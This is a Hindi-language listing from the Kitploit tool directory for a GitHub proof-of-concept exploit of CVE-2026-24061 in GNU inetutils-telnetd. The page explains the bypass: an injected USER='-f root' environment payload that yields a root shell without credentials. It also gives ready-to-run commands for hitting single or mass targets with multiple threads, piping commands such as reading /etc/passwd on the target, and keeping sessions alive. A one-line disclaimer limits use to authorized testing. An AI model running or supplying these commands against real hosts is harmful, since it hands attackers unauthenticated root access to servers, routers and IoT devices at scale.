Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24061-PoC-Exploit — GNU inetutils-telnetd (CVE-2026-24061) के लिए रिमोट प्रमाणीकरण बायपास एक्सप्लॉइट, जो CRLF इंजेक्शन के ज़रिए तुरंत रूट शेल प्राप्त करता है। एकल/सामूहिक शोषण, मल्टी-थ्रेडिंग, कस्टम पोर्ट, पाइप मोड और सेशन कीप-अलाइव का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/tc4dy/cve-2026-24061-poc-exploit
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubtc4dy/cve-2026-24061-poc-exploit

CVE-2026-24061-PoC-Exploit

GNU inetutils-telnetd (CVE-2026-24061) के लिए रिमोट प्रमाणीकरण बायपास एक्सप्लॉइट, जो CRLF इंजेक्शन के ज़रिए तुरंत रूट शेल प्राप्त करता है। एकल/सामूहिक शोषण, मल्टी-थ्रेडिंग, कस्टम पोर्ट, पाइप मोड और सेशन कीप-अलाइव का समर्थन करता है।

रिपॉजिटरी देखें
644 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24061

🚀 CVE-2026-24061 - GNU inetutils-telnetd प्रमाणीकरण बायपास एक्सप्लॉइट

Python Bash License CVSS

GNU inetutils-telnetd संस्करण - CRLF इंजेक्शन से प्रमाणीकरण बायपास और तत्काल रूट शेल

📌 अवलोकन

यह एक्सप्लॉइट CVE-2026-24061 का उपयोग करता है, जो GNU inetutils-telnetd में एक गंभीर रिमोट प्रमाणीकरण बायपास भेद्यता है। USER='-f root' के साथ एक क्राफ्टेड NEW_ENVIRON पेलोड इंजेक्ट करके, यह प्रमाणीकरण को बायपास करता है और बिना किसी क्रेडेंशियल के तत्काल रूट शेल प्रदान करता है।

नोट: basic_exploit.sh स्क्रिप्ट exploit.sh का एक सरलीकृत, तेज़ संस्करण है; हालाँकि, पूर्ण कार्यक्षमता के लिए exploit.sh की अनुशंसा की जाती है।

🔥 मुख्य विशेषताएं

श्रेणीविशेषताएं
शोषण✅ CRLF इंजेक्शन के माध्यम से प्रमाणीकरण बायपास
✅ तत्काल रूट शेल
✅ कस्टम उपयोगकर्ता इंजेक्शन (-f admin, -f user)
स्कैनिंग✅ एकल लक्ष्य शोषण
✅ फ़ाइल से सामूहिक शोषण
✅ मल्टी-थ्रेडिंग (कॉन्फ़िगर करने योग्य थ्रेड्स)
✅ कस्टम पोर्ट समर्थन
उन्नत✅ पाइप मोड (stdin के माध्यम से कमांड निष्पादन)
✅ सत्र कीप-अलाइव
✅ पुनः प्रयास तंत्र
✅ टाइमआउट नियंत्रण
उपयोगिता✅ रंगीन आउटपुट (colorama)
✅ द्विभाषी (Python और Bash)
✅ वर्बोज़/डीबग मोड

🎯 असुरक्षित संस्करण

उत्पादसंस्करण
GNU inetutils-telnetd1.9.3 - 2.7
प्रभावित Linux वितरणDebian, CentOS, Ubuntu और उनके वितरण। (Zorin OS, Linux Mint, Pop!_OS और Elementary OS)
एम्बेडेड डिवाइसNAS, IoT, राउटर

⚠️ अस्वीकरण: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। अनधिकृत पहुंच अवैध है।

📦 स्थापना

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-24061-PoC-Exploit
cd CVE-2026-24061-PoC-Exploit

# Python version
pip3 install -r requirements.txt

# Bash version
chmod +x exploit.sh
chmod +x basic_exploit.sh

🛠️ उपयोग उदाहरण

🎯 एकल लक्ष्य शोषण

root@kitploit:~
# Python version
python3 exploit.py -u 192.168.1.100

# Bash version
./exploit.sh -u 192.168.1.100
./basic_exploit.sh 192.168.1.100

🔧 कस्टम पोर्ट और उपयोगकर्ता

root@kitploit:~
# Custom port (non-standard telnet port)
python3 exploit.py -u 10.0.0.5 -p 2323

# Custom username injection
python3 exploit.py -u 10.0.0.5 -usr admin

📊 सामूहिक शोषण (मल्टी-टार्गेट)

root@kitploit:~
# Create targets file
echo "192.168.1.100" > targets.txt
echo "192.168.1.101" >> targets.txt
echo "10.0.0.5:2323" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt -m 20

# Bash version
./exploit.sh -l targets.txt -m 20

📡 पाइप मोड (कमांड निष्पादन)

root@kitploit:~
# Execute commands via pipe
echo "id; whoami; uname -a" | python3 exploit.py -u 192.168.1.100

# Multiple commands
echo "ls -la; cat /etc/passwd; ps aux" | ./exploit.sh -u 192.168.1.100

⚙️ उन्नत विकल्प

root@kitploit:~
# Verbose mode with debug output
python3 exploit.py -u 192.168.1.100 -v

# Custom timeout and retries
python3 exploit.py -u 192.168.1.100 --timeout 10 --retries 5

# Session keep-alive (maintain shell)
python3 exploit.py -u 192.168.1.100 --keep-alive

📊 कमांड लाइन आर्ग्युमेंट्स

शॉर्टलॉन्गविवरणडिफ़ॉल्ट
-u--urlलक्ष्य IP पताआवश्यक
-p--portलक्ष्य पोर्ट23
-l--listलक्ष्य सूची वाली फ़ाइलकोई नहीं
-m--max-threadsसामूहिक शोषण के लिए अधिकतम थ्रेड्स10
-usr--usernameइंजेक्ट करने हेतु उपयोगकर्ता नामroot
-t--timeoutसॉकेट टाइमआउट (सेकंड)10
-r--retriesपुनः प्रयासों की संख्या3
-v--verboseडीबग आउटपुट सक्षम करेंFalse
--keep-aliveशोषण के बाद सत्र सक्रिय रखेंFalse

🔗 संबंधित एक्सप्लॉइट्स

मेरे अन्य एक्सप्लॉइट रिपॉजिटरी देखें:

  • CVE-2026-41940
  • CVE-2026-0073
  • CVE-2026-29000
टूल डाउनलोड करें